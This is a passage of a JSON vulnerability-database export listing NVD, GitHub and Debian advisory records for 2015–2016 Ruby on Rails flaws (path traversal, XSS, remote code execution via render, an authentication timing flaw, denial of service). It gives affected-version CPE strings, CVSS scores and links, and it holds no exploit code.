"cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.10:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", 
"cpe:2.3:a:rubyonrails:rails:4.1.9:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:00:12", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T02:59:00", "type": "cve", "title": "CVE-2016-0752", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2019-08-08T15:43:00", "cpe": ["cpe:/a:rubyonrails:rails:4.1.0", "cpe:/a:rubyonrails:rails:4.1.12", "cpe:/a:rubyonrails:rails:4.2.0", "cpe:/a:rubyonrails:rails:4.0.6", "cpe:/a:rubyonrails:rails:4.2.5", "cpe:/a:rubyonrails:rails:4.0.10", "cpe:/a:rubyonrails:rails:4.0.2", "cpe:/a:rubyonrails:rails:4.0.5", "cpe:/a:rubyonrails:rails:4.2.1", "cpe:/a:rubyonrails:rails:4.1.1", "cpe:/a:rubyonrails:rails:4.1.8", "cpe:/a:rubyonrails:rails:4.2.2", "cpe:/a:rubyonrails:ruby_on_rails:4.1.11", "cpe:/a:rubyonrails:rails:4.0.3", 
"cpe:/a:rubyonrails:rails:4.2.4", "cpe:/a:rubyonrails:rails:4.0.4", "cpe:/a:rubyonrails:rails:4.1.14", "cpe:/a:rubyonrails:rails:4.1.2", "cpe:/a:rubyonrails:rails:4.1.6", "cpe:/a:rubyonrails:rails:4.0.7", "cpe:/a:rubyonrails:rails:4.1.7", "cpe:/a:rubyonrails:rails:4.1.3", "cpe:/a:rubyonrails:rails:4.2.3", "cpe:/a:rubyonrails:rails:4.1.5", "cpe:/a:rubyonrails:rails:5.0.0", "cpe:/a:rubyonrails:rails:4.1.9", "cpe:/a:rubyonrails:rails:4.0.0", "cpe:/a:rubyonrails:rails:4.1.10", "cpe:/a:rubyonrails:ruby_on_rails:3.2.22", "cpe:/a:rubyonrails:rails:4.0.9", "cpe:/a:rubyonrails:rails:4.1.4", "cpe:/a:rubyonrails:rails:4.0.1", "cpe:/a:rubyonrails:rails:4.1.13", "cpe:/a:rubyonrails:rails:4.0.8"], "id": "CVE-2016-0752", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0752", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:rubyonrails:rails:4.0.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc3:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc4:*:*:*:*:*:*", 
"cpe:2.3:a:rubyonrails:rails:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.6:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:ruby_on_rails:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.10:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.2.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.0:-:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:rubyonrails:rails:4.1.9:*:*:*:*:*:*:*"]}], "github": [{"lastseen": "2023-01-23T20:08:38", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-10-24T18:33:35", "type": "github", "title": "actionview Path Traversal vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2023-01-23T18:03:51", "id": "GHSA-VX9J-46RH-FQR8", "href": "https://github.com/advisories/GHSA-vx9j-46rh-fqr8", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-23T20:08:38", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails 3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow remote attackers to inject arbitrary web script or HTML via text declared as \"HTML safe\" and used as attribute values in tag handlers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-10-24T18:33:35", "type": "github", "title": "actionview Cross-site Scripting vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2023-01-23T17:59:44", "id": "GHSA-PC3M-V286-2JWJ", "href": "https://github.com/advisories/GHSA-pc3m-v286-2jwj", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T05:07:40", "description": "The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-10-24T18:33:36", "type": "github", "title": "actionpack is vulnerable to remote bypass 
authentication", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2023-01-11T05:07:24", "id": "GHSA-P692-7MM3-3FXG", "href": "https://github.com/advisories/GHSA-p692-7mm3-3fxg", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-23T17:08:30", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2017-10-24T18:33:35", "type": "github", "title": "actionpack allows remote code execution via application's unrestricted use of render method", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2023-01-23T15:11:26", "id": "GHSA-78RC-8C29-P45G", "href": "https://github.com/advisories/GHSA-78rc-8c29-p45g", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-09T05:07:36", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "github", "title": "actionpack is vulnerable to denial of service via a crafted HTTP Accept header", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2023-01-09T05:03:05", "id": "GHSA-FFPV-C4HM-3X6V", "href": "https://github.com/advisories/GHSA-ffpv-c4hm-3x6v", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-09T05:07:36", "description": "Directory traversal vulnerability in 
Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "github", "title": "Directory traversal vulnerability in Action View in Ruby on Rails", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2023-01-09T05:03:40", "id": "GHSA-XRR4-P6FQ-HJG7", "href": "https://github.com/advisories/GHSA-xrr4-p6fq-hjg7", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-09T05:07:30", "description": "Withdrawn, accidental duplicate publish.\n\nDirectory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {}, "published": "2018-08-13T20:48:52", "type": "github", "title": "Moderate severity vulnerability that affects actionview", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2023-01-09T05:02:49", "id": "GHSA-2PWF-XWR3-HP55", "href": "https://github.com/advisories/GHSA-2pwf-xwr3-hp55", "cvss": {"score": 0.0, "vector": "NONE"}}], "debiancve": [{"lastseen": "2023-03-26T06:09:35", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-04-07T23:59:00", "type": "debiancve", "title": "CVE-2016-2097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-04-07T23:59:00", "id": "DEBIANCVE:CVE-2016-2097", "href": 
"https://security-tracker.debian.org/tracker/CVE-2016-2097", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-26T06:09:35", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails 3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow remote attackers to inject arbitrary web script or HTML via text declared as \"HTML safe\" and used as attribute values in tag handlers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-09-07T19:28:00", "type": "debiancve", "title": "CVE-2016-6316", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-09-07T19:28:00", "id": "DEBIANCVE:CVE-2016-6316", "href": "https://security-tracker.debian.org/tracker/CVE-2016-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-26T06:09:35", "description": "The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x 
before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-02-16T02:59:00", "type": "debiancve", "title": "CVE-2015-7576", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2016-02-16T02:59:00", "id": "DEBIANCVE:CVE-2015-7576", "href": "https://security-tracker.debian.org/tracker/CVE-2015-7576", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-26T06:09:35", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-04-07T23:59:00", "type": "debiancve", "title": "CVE-2016-2098", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-04-07T23:59:00", "id": "DEBIANCVE:CVE-2016-2098", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2098", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-26T06:09:35", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T02:59:00", "type": "debiancve", "title": "CVE-2016-0751", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
